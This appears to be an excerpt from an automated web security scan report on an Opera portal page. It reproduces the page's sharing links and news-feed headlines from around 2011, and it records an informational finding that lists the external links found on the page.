href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:06fd0a876e811dbfec64224eb666b4a9:B37QcdLy2uVNPflgKCQFBCl6kNwk2UTfyi%2FEuCQaZmPlRNLAo866aKMimJh4nzzN88x%2Fo7AVCpsShA%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:17ebedcfb696e35bf5d944b84ce62c1a:N3KrhN87z9lSsPFxz9b3ow9V2TD%2FBY9N4YHOSDTx8BSOnut70VmPqgfeqUge7nYiSV9hzw9jMY34iQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:9099604428720fb2ae7ca837343e23be:4IavsCsRvzwGo5i4B8%2BVD00%2BvOprIzA8te8J2Dp2Kxwa2yl0No3F20LL37UreChFY8EjrrrHfyBTrg%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:a4f0742376635e1c7a2b5d307ce72976:Lw%2BnBvSaPLa6EP3pMxTi9R1Zia5IsUEU8ZtkIuGMY1KoxBwoG%2F5IVBSWGNqxT4vPxHi9y%2FrmqpkDjg%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:3e66a08937abb8e3558c8c072a770930:DBT5UVQFGUkDsrUyDiYe7i9DUIHmvI3VQyR8z7Mrh1Dqs4NJxzdvcas5VTPSS5hKcB9np%2BZCd8covF4%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=649cedd8031e35c26f5dca96f92fa840" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=cbf37eb1101ccbc54a1a315904c9717c" title="Smackdown: Woodward vs. Cheney" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:160b097cfc899bedef1747205581a755:G5enu4LL5Dnjfkh6OoZ%2F4cV5ndosnzRXSsIcxysVBoH3oHhZ0adAb%2FigfBR9qEXks8KcgKuF0lprxw0%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:07d83733e9cd90da9d72bc73b5226544:SiQj4u8b%2FcH%2BamOXbmC11ZwAW0FxxmEJkXzPe13cE9G7NYki7J%2BZS9lE2Uv84Fuhw%2Fayuw%2FNmZ6Vvmk%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:b68af884721b95ee2d8b03d5cc73f7c0:D47wpo20Uewow3joISMoxJzlL6KG%2FJnZLkQx0W%2BktzKOwOhKzOipiuIDEZaDqeaBLEa9fwp9q9pwZw%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:3f336ac94ff5e6e319fd33cd1b7932a7:UP0gbq0IZAfKll8TtlQUowaxzqFoJGlkKbvISu8mEmajh0x%2FlbcBsckoi7qLNHhzqQsOr4IApItWSQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:705593dd8c63ebcc99184de5b8ea9712:%2BgJFM%2BhkXT8IpwZPKd%2FMWBSfzfeuhjRx0c%2B41qLYsZyLAq6TSza28HJcAkUhI%2BSmJcqgq4k3W7S5kQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:69279d531bc2a400190f1f605019163e:wjXqX%2F4z7qDpXpJJGqW9KABWchsSoJHt2BEOO5tLO0cxjziIaR6viNkH4RQBNooB%2BORXaidpP7heig%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:a2aea7a5e5db9ffe2cb9c8ff8c87b2c8:8qC16lGkmnXR9zuU1lo53EhMoHK1e9Ui8D0reXurvvIp1KwB2wWhwYOHhhP6VAmrVYkDxex%2BBJiyeOo%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=cbf37eb1101ccbc54a1a315904c9717c" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=db11fdeab74ef66ff554f834b8dd5e5f" title="Poll: Congress sinks even lower" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:5321480c9259156bdd4bf922e981d8d1:z6LAAUwM48rohEOMrnlf6%2FV7QXcW80POyIN8DfB%2FBVvoM8CAoi68P3OOME9R4%2BRtdkVj%2BpkHWzrAFmA%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:0e6799c28de2dcdc79f12082bffa3011:ncGKIXxXTADQHxdApOl2%2BhW5blB7Yhqs6G8wadh3YQ7KSbfSUQ4c8m4xte9kXOafDrrZw4F0KTVG8PA%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:d1fa54cd22e6c107ddf242cb213fb3e9:Mc9hDw4Z6MZ5GBA%2FoL47LXhxgUI2WdDM3DSPkFJztIqB7MdjMOnOu0l%2B93kpPgsnnvF8Fll6JwtrpQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:ef9c9980b3317296695f58f599cfc2de:m67ok2LCezL1ay0a78%2BKN5znGORb426ZZB1nLcSkjvFeMFjJpypPOUThCrPbolNoWFmadsIbmO87lQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:dd21acf7079b5d05bce54c6a2a61ce46:madQ11nPw%2BsNoaNLgnyunMe7wpHoStigIjPNY%2BksBE3rzbih2kJOlAnQ0wPDTTqjP7cvrU6WDlaC0g%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:b11ec77ddfa166d84643fad6a60642e6:VcvOhe2mvxV80VHL1uhJ4v1ONVV1Gjf5%2B%2FBV%2FYkWLAti%2BMviPMS6wo8a3fmcknv7XWysny%2FvNaQ4og%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:7ae7d50c4400864f1fb4a4aa771f4405:oh7nYgv1qPIIBnLWVKPdv4TJcZ%2BzyHglM5NpbGKEdens1R1X%2BhdvtAQbr%2BMIEIdN7SAQazrHTV3gZt8%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=db11fdeab74ef66ff554f834b8dd5e5f" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=16d0b3cc957550880148d568463b1199" title="Book: Geithner ignored Obama order" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:26cb75744dbb640ab13a1646430b530b:svwZ83P%2F%2FJ2TtM1d%2F3LbG2gc587p6NIEC44ToruxMicT5TKZDpo%2BeNzB6DpWRattPek%2FUeIv9s1FIuY%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:1162f9a4f4544b8d93212ea04b30f3b5:NvoRVmmOrgZ%2BjqTmSdceAWfWOMY5SIIvjXgJwyniBEkiKhk%2FwRpf64DPpV8JBo2K%2FMkx9GgkBqswgmw%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:9b12cfb3f67744704696df9bd9ea3674:M637JCrfiK3lIgi%2FmZ7%2B6DcqChpVBqzEYyJaYL2aksXsglaUT4P%2FR8hXoyU1lQRvdFK6KpoemD4ThA%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:7d22c5d45ab447e28914283b77c4ca15:iWvfCVJdAQQvHwb9suksF6l8EPyHg4XiHK1OrhK9LNzB%2FSFBtHQYFfQ5rIz96ZpXPrH5761zJFGIRw%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:be44c6e8e6ba5c89da8d68e52553beb2:eJXKpxEf%2Br%2BPUT10hCv68AHotians5iygX0fyQaNJCNfnqrquQMTuaUFSr7TwdpswPTaGlIQZPwuMA%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:2eed2063b27640ee0cd0c3c577efd87d:mkW7026fpnPXHlgWjY824FHXXQ%2BHYWaS%2FbqmvJ0L4CKoAjVyL8GIIX5IoskZ1oR7yDdrk7Bioi6AjA%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:227af06f8d1bf6ec40356673201a62ee:R5o%2FjiIKN8uRbTo0S8Ti0i5UbuMA6lAjmXI4xWhwXqwslzkdPGcnBSk8Um4jM6EEBz6%2BAYmL9JVER7Y%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=16d0b3cc957550880148d568463b1199" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=23cfbc74356e5bcf9ff47a2e8f09a761" title="Obama should take notes on Texas" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:a62d52783f6dc2aae716becc87105151:Oy46wFZG47fTR7zmzbvekMcdDoaZILF8jDdMcVig%2Bg5cSNNIoh9x3S%2BLqnbxSStKwdfO%2BevQyj5WCmg%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:922c8b42feab8011af107bf845a164ba:e%2BtzGBeyDuP8kv2F4r92stkBKBQ5S2527ZWD%2B8c5uaqFJQOKX6jYaySGde5d0I6WvuYkrp59q3%2B%2Bn%2BA%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:4aab9a4a68d95a87dba26ec50d2263bf:sFEhCoonHjRd4H01vQCQuYqleAwMVo3XATdHuRpvd1tk29oF2%2BJqpsBFHZ8ayJrddr61H2DFhih9Lw%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:9e6508d1dd2cbed3b4fcd1aa0ba09b89:8yN5tMwUCGan2TeZ%2BhyePMTIozcFeL0KhpjhrzaYA1Qrdj%2FPtL9g0XmPG1t0QO5AL%2BX9yGNoxOButA%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:e598792623131d00bf48ada2b793c3a3:Gcb8Is6p7Kv59TAaAXeUo3KNwcPJYggdxvsuoEbHyrCC3N2hGGC5mhKdAa1f8shyswcmdfFAjWLQeA%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:6993129d1ee290ab494ffcbbb611d497:I7D7MFtnCfpzNo1ZK69LoDD0PnHrcR4Xfsc5EQbxwDyG4zCr36QImDqpOEP1w%2BFTUUR%2Fca0pOmcv6g%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:f140ed990ca70fd4731101049b84c4a3:QF61W2%2FnPHg0lfJJ07Liz9zhqEQg9E%2BjD18%2BWthbGOjLDtXRHqtS8JpU7ZwilJJCXT%2BIy6kiuzs7FtM%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=23cfbc74356e5bcf9ff47a2e8f09a761" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=ef2ab6deb28c34038239d6751ed679fc" title="Panetta: Cuts would hike joblessness" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:67f69572599335f9f92a0255abe84f8f:jFpKmaAew3MoArYO9j7ynCCwhcxw4rJ9nBLu%2BK1jx2tZRobvDP2POHrC%2FWhR0lo%2Bb9I8fFhLgQ3YgOo%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:4b2c749782448392976d492ac3d75c29:Pi6k7fE0qD5QxLPj1CkqJMYKWU%2BmNhL4FbFwGp251Be8kxrEC9FrRgSaiA0cI8MewkTZqyRFBzQ%2Fbsw%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:a6c9fc893592a3b15a7bf63bbe463761:NXq4To3cM4hlZG8YVoscWkZcJpg9ai0pghp1D5XM8%2BupqRV08PPMkRNg2rcASiHZcQe1wp4VCZEhoA%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:9fa01cc55eacbb2559f0e07b11a4d580:eXR%2FgNrYn%2B3K86xRfWPk9PYQ%2BxoLaVsV090wIIVyqKPVKPoyMDTHUWgfbDGfUokTwdX52cWayDZpvQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:fb6f58ce6c84594102cf8b0e7197c54e:5lFdaaWmbncCmBo8OkNnEYY2fO1t8tHeYYDeNPIfjiJqbdzsy5nbgoqwwsPaq8RSpJSO5uguUr3jaw%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:7f9e45bda1c37dd0ccbf8d84a9db08d9:hpyP64LjWoi9Qa%2FqkxqxvaFoM%2FuvYA8mKALkVYk%2F21G6MS5YVk4EwesgNdMbgnjXt3T11ytq1uEHIQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:d0a1f5b1ffddf9157329945a18b7e80b:jrozdH2o0R1iJjLx9aVaF3hQdFU12vW21HaHJ3glkzeDZXJ3L%2FgtnGmBrXxDKhn4pFqUSUi2dW%2FUB%2Fw%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=ef2ab6deb28c34038239d6751ed679fc" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=4c13bb36f9884e02f2504daebb91abfb" title="Poll: 1/3 say U.S. would be better off with Hillary Clinton" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:e121c99847eca8e0320005e2b82f51e9:EJs2Icy3%2BY%2B%2BVnXjaoss33yYPC7ccHpJqnk%2FioN3t2Vlid90G%2BZ5ZQjwLI6qey4jd04eIX1IPWdgdxY%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:436e277e40f3f5a6216b7495f9795c4c:%2BSiul%2BGrdRqnMaflXzDD9RreKF%2BCjouQmr3Umtu6Hlml9Fw53dhxfjHhtSdv6okfCDzIhXVIFEDSKtI%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:d5a6392872e0e563ae3de7b584c6842e:QITbI%2F4VQqr6K%2FfjPMAoSPY1mPb5y9VAZfI4xA9%2BNuGrrnLDBxl4kWTKx4j%2FSgB%2FYcAw03wM5L4NiQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:1e02feb6e3d57702b3b13eb759519b3a:1WJ6f%2BXatTnx83nePqcclVdS3ywVzm02Njse6k7Ge9YhIN03sBj5%2B9%2BsCi8bH2nUM%2Bp%2BevSUNVYYSw%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:09414cd950f83c51ae2b183db5a9bb6e:Fa24w0FK6zL1z%2Bf40Zp5Pwz7r6vJvRZ0IFutfuIIcZgr4a8MHamCQZUvZZWlHJudq4LyeIHpabpWHw%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:358c595dd796564fc554751b07003d99:Yt7aN0vEIvzcHk2GVqFIkIsTLgXBuwNxsGuI9W%2BwD0Mk0m1DjqgGurJQaFjFQR8bgeY3KWE67LC54w%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:53d8e273259a447c969e0e61d45032aa:hqDb17pDzUs8kZZgkw5DZ9LlTzoAXIMzyPp4cZFNtcKELyRVE8FEh1Le%2FWYK6WiqaNynJcF4Dsaococ%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=4c13bb36f9884e02f2504daebb91abfb" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=dff44d839a446e6f1031175aaa42023d" title="PETA's PR prowess" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:bd029637ec852bb208f87ae7c77b342f:IGRK6DRbg18kfzUSfz5vcDAmYtqbPyVM0fCZRwRWcGKhFsBkQ3ykeKEUCD251fU6nUsfDtajwV4qFqg%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:0bd62913dfa783b5510f36ebe3b4c58e:6zfkGMxvoDg%2FwdzfOMJ8sAhEOHSmv%2FqTBcsEfr9PZc5ZbB7WZQtypjLEjqemUSoKt1c9AjREfxn6Q9I%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:09857ff200e5abd66591ac54b6298af8:GZi7z9kBfZjxkF02WS1XpwNxstOsejoxAGClc5OBeX4Qo5FNh4%2FplCD9nCAQFb6R6mb4sTG13NwV8A%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:4faf8842a9ef35addc36ffb420bf8aea:0tFuUFn03xZrTeZO9jjj5eUSRNB4HdSh1mjPc%2BDV0GhoermUq4E8b3%2F0n8gS51iDtJprbkv6W5%2Bp4Q%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:0aeaa3512c88d2c044788ff8afb93a5d:rrmlNpNCbypzQz0X%2Fs8sTDzybngD1kTzONiSW35kS46dcPL9VtRaPGKzWn%2FMFZQd38T8HqVkM2HPRQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:548478fb2a9e7afe8b883ef702db7f3a:yjpPUcVRm1j%2BcqFdqW4wxRS2LjpJUWd8YgbZ2TZudiWPaG9Op7qPBvNVxYwaAPiPcCvus5f3Jnsq4g%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:1b7cfaf3c40b4a980afb564e90e76f18:zg1FpKM6cwW9TQR9UlWb96E9qOrkQZbmuq4TBeRQfn6mKHrV7ptjTKzb4Dj%2B1pfYOQi81y5qit67pmE%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=dff44d839a446e6f1031175aaa42023d" target="_blank"> Read more.</a>...[SNIP]... <a class="art-opn" href="http://feeds.politico.com/click.phdo?i=db9b0c3aa22e46e7e44a68bc3c653622" title="Obama's Palestine problem" target="_blank"> ...[SNIP]... <a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:1a51ea5ac220ce3ac1aa5bfd9ac6c77a:Nu%2F1FyEtJCoT%2Fw6K9eRFvzO%2F9Ur5lIImuJvXOa3ljkqID5VnPyJ0Wnv9vrBwe21jxh3nBoqLTRhCA58%3D"> <img src="http://images.pheedo.com/images/mm/twitter.png" title="Add to Twitter"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:9c5f123e8602bfc6839d261ff46344ee:Out%2Ff49sEdzyR3oeXoTZc0SqGyMjz3KaMgU5fIns9gXfijtwWlOSm8DNqj6Ywt3SKmIF81YrZcof42k%3D"> <img src="http://images.pheedo.com/images/mm/facebook.gif" title="Add to Facebook"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:88934c298c46cb3ae6d9025688f648f2:7YCiPR8JicE%2FyrXKkW5OhK9v78hnWhc0HJVTTvrrB6ZuPtXKWPSaNq6DZmT75WATMF51VXx1GGWy4w%3D%3D"> <img src="http://images.pheedo.com/images/mm/emailthis.png" title="Email this Article"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:0fbacaf9634e6c796450ead95806aa6f:Krdg7gT1eReN57zfqtHlj3W%2FqACO49WuvkhRQC5UrSzWjRAiMnvG8T3TwvF1QoK2z7514fbbi0gdaQ%3D%3D"> <img src="http://images.pheedo.com/images/mm/digg.gif" title="Add to digg"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:4b54171bd4931a5c5055fa5f73f5a2f6:xLWS91Mj5TE7nqgJGG1dP4PolFmKRlajBdFNj1LPwIuAfW80iBB9fSdpsk6iVmqIn0fUFQnRJjeBsg%3D%3D"> <img src="http://images.pheedo.com/images/mm/delicious.gif" title="Add to del.icio.us"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:a98dfb1c8a2b05d1103ab17f9c0da5e1:Y7aHPwE0NiUxqJqNdHxwyRG5cP802F2K2I71J1lcScGhTW68ySDR9ZhgJdHhgUhPz%2B8YGSkrVq3lJg%3D%3D"> <img src="http://images.pheedo.com/images/mm/google.png" title="Add to Google"/> </a><a href="http://www.pheedcontent.com/hostedMorselClick.php?hfmm=v3:069b78aaad01245184fb982f7cc98d77:bZ0qguRZNO%2B1qg5wRdgR%2BMAmqvHycOZQWGmYFB5HNVs5xRBMRwRMA%2B3717su1h7jVEN5Lf3cVQNiDMQ%3D"> <img src="http://images.pheedo.com/images/mm/stumbleit.gif" title="Add to StumbleUpon"/> </a>...[SNIP]... <a href="http://feeds.politico.com/click.phdo?i=db9b0c3aa22e46e7e44a68bc3c653622" target="_blank"> Read more.</a>...[SNIP]... <SCRIPT charset="utf-8" type="text/javascript" src="http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733"> </SCRIPT> <NOSCRIPT><A HREF="http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822%2FUS%2Fopera-20%2F8002%2F238229ae-452b-41fb-b7b3-1913a7cb0733&Operation=NoScript"> Amazon.com Widgets</A>...[SNIP]... <a href='http://rover.ebay.com/rover/1/711-53200-19255-8/1?campid=5336830850&toolid=71153200192558&customid=&mpvc='> <img border='0px' src='http://rover.ebay.com/ar/1/711-53200-19255-8/1?campid=5336830850&toolid=71153200192558&customid=&mpt=[CACHEBUSTER]&adtype=1&size=300x250&mpvc=' alt='Click Here'> ...[SNIP]...
15.34. http://portal.opera.com/portal/tabs/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://portal.opera.com
Path:
/portal/tabs/
Issue detail
The page was loaded from a URL containing a query string:http://portal.opera.com/portal/tabs/?tab_name=Opera%20Portal http://api.tweetmeme.com/imagebutton.gif?url=http://espn.go.com/boston/nfl/story/_/id/6976712/randy-moss-return-new-england-patriots-no-done http://api.tweetmeme.com/imagebutton.gif?url=http://espn.go.com/golf/story/_/id/6976550/jack-nicklaus-says-tiger-woods-win-18-more-majors http://api.tweetmeme.com/imagebutton.gif?url=http://espn.go.com/nba/story/_/id/6975352/nba-lockout-players-owners-declare-unity-separate-meetings http://api.tweetmeme.com/share?url=http://espn.go.com/boston/nfl/story/_/id/6976712/randy-moss-return-new-england-patriots-no-done&service=bit.ly&source=espn http://api.tweetmeme.com/share?url=http://espn.go.com/golf/story/_/id/6976550/jack-nicklaus-says-tiger-woods-win-18-more-majors&service=bit.ly&source=espn http://api.tweetmeme.com/share?url=http://espn.go.com/nba/story/_/id/6975352/nba-lockout-players-owners-declare-unity-separate-meetings&service=bit.ly&source=espn http://bit.ly/o5GOsN http://bit.ly/oJToCd http://bit.ly/pup0zO http://edition.cnn.com/2011/WORLD/africa/09/16/kenya.kidnapped.tourist/index.html?eref=edition http://edition.cnn.com/2011/WORLD/europe/09/16/switzerland.bank.lost/index.html?eref=edition http://edition.cnn.com/2011/WORLD/europe/09/16/uk.wales.mine/index.html?eref=edition http://espn.go.com/boston/nfl/story/_/id/6976712/randy-moss-return-new-england-patriots-no-done http://espn.go.com/golf/story/_/id/6976550/jack-nicklaus-says-tiger-woods-win-18-more-majors http://espn.go.com/nba/story/_/id/6975352/nba-lockout-players-owners-declare-unity-separate-meetings http://feedproxy.google.com/~r/Techcrunch/~3/-pMXiJi-T48/ http://feedproxy.google.com/~r/Techcrunch/~3/_8IvhfdMJoQ/ http://feedproxy.google.com/~r/Techcrunch/~3/du5FIrILPCM/ http://feedproxy.google.com/~r/businessinsider/~3/Wkzq2k01E2c/solyndra-gate-the-scandal-threatening-the-obama-administration-2011-9 http://feedproxy.google.com/~r/businessinsider/~3/vFxOE7IAAPI/bill-belichick-randy-moss-pirate-2011-9 http://feedproxy.google.com/~r/businessinsider/~3/zatilsMGZuQ/solyndra-heres-a-comprehensive-guide-to-the-scandal-2011-9 http://feeds.washingtonpost.com/click.phdo?i=010ebbf4e7915314287995aba7ae0d1e http://feeds.washingtonpost.com/click.phdo?i=0659493a8970de24618285eabec993de http://feeds.washingtonpost.com/click.phdo?i=2f39a29d431fdacf8c1e7d52b699d95e http://feeds.washingtonpost.com/click.phdo?i=4e42202c2cb14ed321d79d1598ee8cec http://feeds.washingtonpost.com/click.phdo?i=f2da411114510f46bd5afc3dab82be5a http://files.myopera.com/jdlien/blog/Googerola.png http://files.myopera.com/jdlien/blog/anonymous_facebook.png http://files.myopera.com/jdlien/blog/browsing_productivity.jpg http://googleblog.blogspot.com/2011/08/supercharging-android-google-to-acquire.html http://ll-media.tmz.com/2011/09/16/0915-salahi-ex.jpg http://ll-media.tmz.com/2011/09/16/0916-charlie-sheen-today-video-credit.jpg http://ll-media.tmz.com/2011/09/16/0916-matt-heather-ex-01.jpg http://pagead2.googlesyndication.com/pagead/show_ads.js http://rover.ebay.com/ar/1/711-53200-19255-8/1?campid=5336830850&toolid=71153200192558&customid=&mpt=[CACHEBUSTER]&adtype=1&size=300x250&mpvc= http://rover.ebay.com/rover/1/711-53200-19255-8/1?campid=5336830850&toolid=71153200192558&customid=&mpvc= http://static5.businessinsider.com/image/4e68e47becad04ba2800004d-400-/solyndra.jpg http://static5.businessinsider.com/image/4e6a2642ecad047803000000/solyndra.jpg 